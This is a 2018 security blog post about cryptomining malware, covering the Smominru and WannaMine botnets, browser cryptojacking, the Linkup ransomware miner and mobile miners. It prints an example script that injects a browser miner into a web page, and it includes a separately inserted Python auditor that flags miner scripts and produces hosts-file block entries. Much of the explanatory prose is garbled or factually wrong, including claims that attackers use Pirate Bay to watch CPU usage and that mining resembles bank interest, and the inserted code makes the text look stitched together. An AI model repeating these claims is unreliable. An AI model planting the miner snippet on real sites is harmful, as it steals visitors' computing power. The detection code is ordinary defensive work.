Monday 2 April 2018

CRYPTOCURRENCY MINING IN AN OFFENSIVE WAY




Cryptocurrency is a kind of digital currency that is transferred across the internet, and through cryptocurrency mining people have started to earn money online.
Recently many people have begun to make money through this process, which calculates a hash for every payment. As an analogy, when you transfer money online, the interest rate of the transaction is shared with the bank that moved the capital.
In the same way, cryptocurrency mining computes the hash for each payment, and a share is passed to the person who mines it. Each transaction is added to the blockchain, and on that basis new bitcoins are created.

CRYPTOCURRENCY MINING MALWARE INFECTED OVER HALF-MILLION PCS USING NSA EXPLOIT

Several cybersecurity firms are reporting on new cryptocurrency mining viruses that are being spread using EternalBlue, the NSA exploit that the hacking group Shadow Brokers leaked.
Researchers from Proofpoint discovered a massive global botnet dubbed “Smominru” that uses the EternalBlue SMB exploit (CVE-2017-0144) to infect Windows computers and secretly mine Monero cryptocurrency, worth millions of dollars, for its master.
In 2017, the Smominru botnet had already infected more than 526,000 Windows computers, most of which are believed to be servers running unpatched versions of Windows. According to the researchers, and based on the hash power associated with the Monero payment address, the botnet is about twice the size of regular botnets.
This botnet has already mined over 8,900 Monero, valued at about $3.6 million, at a rate of roughly 24 Monero per day. Through it the operators set out to hijack millions of computers, and it mainly affects Russia, India and Taiwan.
Proofpoint researchers say that the cybercriminals are using at least 25 machines to scan the internet for vulnerable Windows computers, and are also using the leaked NSA RDP exploit EsteemAudit (CVE-2017-0176) for infection.
WannaMine is another recent malware that uses the EternalBlue exploit to infect computers and mine Monero cryptocurrency. It was hard for antivirus products to detect, and it affected many companies for weeks or even months.
Attackers have also started to use cryptojacking: browser-based JavaScript code with which cryptocurrency miners use the CPU power of website visitors to mine cryptocurrencies for monetisation.

BROWSER-BASED CRYPTOCURRENCY MINING:

Browser-based cryptocurrency mining is mining that is performed through your browser. It is one of the oldest methods, launched in 2011, and it works through scripts. It differs from file-based cryptocurrency mining, which involves downloading and executing detectable files.
Bitcoin Plus is one of the methods for mining in the browser. A JavaScript snippet is generated and injected into a web page; when a visitor signs up on the page, the script runs automatically and browser-based mining takes place. The mining JavaScript code is shown below for reference.
Example script:
  <!-- Loads the miner library from the third-party host -->
  <script src="https://testphp.vulnweb.com/lib/testphp.min.js"></script>
  <script>
    var miner = new cognitive.User('<site-key>', 'john-days');
    miner.start();
  </script>
Once this code is executed on your website, the visitor's browser starts to mine, which also increases the CPU load, and by this method the end user of the script can easily profit.

PREVENTION FROM BROWSER CRYPTOCURRENCY MINING:

Apart from ransomware, cryptocurrency mining malware now plays a significant role in our daily life, and this kind of mining is mainly run through websites.
Most attackers use Pirate Bay to look over CPU process usage; we can also use it to detect the CPU usage of our own system and check whether any unknown website or mining website is running.
In this way we can detect many mining sites, and there are also several browser add-ons and settings that identify mining websites, as follows.
  • Use the No Coin extension
  • Use the MinerBlock Chrome extension
  • Block coin mining domains in the hosts file
  • Use NoScript in Firefox
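
A site owner can run the same kind of check on their own pages. The sketch below is an added example, not code from the original article: it lists external script hosts that are not on an allow-list, flags inline code shaped like the example script above, and prints hosts-file entries for the flagged domains. The names audit_page and hosts_entries, the allow-list host and the sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic from the page's example: `new <lib>.User(...)` then `.start()`.
MINER_CTOR = re.compile(r"new\s+[\w$]+\.User\s*\(")
MINER_START = re.compile(r"\.start\s*\(")

class ScriptAudit(HTMLParser):
    """Collects external script hosts and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.hosts, self.inline, self.in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            host = urlparse(dict(attrs).get("src") or "").hostname
            if host:  # relative URLs have no host: same origin, skipped
                self.hosts.append(host.lower())
            self.in_script = True
            self.inline.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.inline[-1] += data

def audit_page(html, allowed_hosts):
    """Return (script hosts not on the allow-list, inline miner start-up seen)."""
    parser = ScriptAudit()
    parser.feed(html)
    parser.close()
    unapproved = sorted({h for h in parser.hosts if h not in allowed_hosts})
    miner = any(MINER_CTOR.search(s) and MINER_START.search(s) for s in parser.inline)
    return unapproved, miner

def hosts_entries(hosts):
    """Hosts-file lines that point each flagged domain at 0.0.0.0."""
    return ["0.0.0.0 " + h for h in hosts]

# Constructed sample page embedding the article's example script.
SAMPLE = """<script src="/js/site.js"></script>
<script src="https://testphp.vulnweb.com/lib/testphp.min.js"></script>
<script>var miner = new cognitive.User('<site-key>', 'john-days'); miner.start();</script>"""

if __name__ == "__main__":
    print(audit_page(SAMPLE, {"www.example.org"}))
```

The inline pattern is only a heuristic and will miss obfuscated code, so the allow-list of script hosts is the stronger of the two checks.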

HOW CRYPTOCURRENCY MINING ACHIEVED THROUGH RANSOMWARE:

Cryptocurrency mining can also be done using ransomware techniques. A new ransomware miner called Trojan-Ransom.Win32.Linkup is a new kind of ransomware: it does not encrypt your files, it just creates a mining robot on your system.
Linkup sets up fake websites on your system. When a person browses, the site is redirected to another site, and the add-ons on the fake site credit a share to the miner.
The ransomware asks you to download some malware files, and once they are installed it automatically downloads bitcoin mining software.
When the victim clicks the software, it is executed, and it makes your CPU or system run faster and consume more energy.
This in turn raises your electricity bill, and based on the electric energy consumed the crypto miners get some shares.
Linkup also differs from other malware such as CryptoLocker, which is also ransomware: it hit a US police department and demanded $800 in bitcoins, removing the virus once the demanded amount was paid, which renders it more concerning than Linkup.

MOBILE CRYPTOCURRENCY MALWARE ATTACKS:

Cryptocurrency mining malware attacks have started to affect mobile devices by embedding mining code in Android apps. They mostly affect Android users who download legitimate-looking apps that are packed with code that “mines” for hackers without the user’s knowledge.
These attacks are already happening in North America and Russia: half of the cryptocurrency mining malware attacks are in Russia and 20 percent are in the US. In a recent spate, attackers started to send fake phishing messages in Australia that try to convince victims to download mining malware to their phones.
One example of mobile cryptocurrency mining malware that Symantec sent to Motherboard appeared to be a fully functioning crossword puzzle game app, but in the background it was mining cryptocurrency. Running such mining apps may drain your battery and make your phone less responsive, so be careful before you start to use unknown apps.

OVERALL CRYPTOCURRENCY MINING USED BY THE ATTACKERS:

CONCLUSION:

Cryptocurrency mining attacks can spread through various channels such as botnets and browser-based JavaScript mining code, and they also affect mobile phones through malicious apps. Many attackers have started to earn money through this kind of cryptocurrency mining, and you can check it through some bitcoin apps that are available on the internet.

AUTHOR

RamKumar G
Security Engineer
BriskInfoSec Technology and Consulting PVT LTD
Find  me @ https://www.linkedin.com/in/ram-kumar-3439b511a/